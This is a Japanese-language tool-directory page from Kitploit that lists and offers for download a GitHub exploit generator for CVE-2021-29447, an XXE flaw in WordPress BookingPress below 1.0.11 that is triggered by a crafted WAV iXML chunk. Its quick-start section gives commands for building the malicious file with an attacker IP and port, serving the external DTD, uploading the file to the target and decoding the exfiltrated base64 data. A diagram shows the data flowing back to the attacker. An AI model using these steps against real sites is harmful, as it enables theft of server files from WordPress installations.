Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-29447 — XXEペイロードジェネレータ | Kitploit
ツール/GitHubGitHub/0xricksanchez/cve-2021-29447
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出ウェブセキュリティ
GitHub0xricksanchez/cve-2021-29447

CVE-2021-29447

XXEペイロードジェネレータ

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WAV iXML XXE エクスプロイトジェネレータ

不正なWAVファイルを生成し、iXMLメタデータチャンクを解析するWordPressプラグイン(例:BookingPress < 1.0.11)のXXE脆弱性を悪用します。

クイックスタート

root@kitploit:~
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d

ワークフロー

root@kitploit:~
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │

影響を受けるターゲット

  • WordPress BookingPress プラグイン < 1.0.11
  • WAVファイル内のiXMLチャンクを解析し、外部エンティティを無効にせずに解析するすべてのアプリケーション

参考情報

  • WPScan脆弱性データベース
  • CVE: CVE-2021-29447
ツールをダウンロード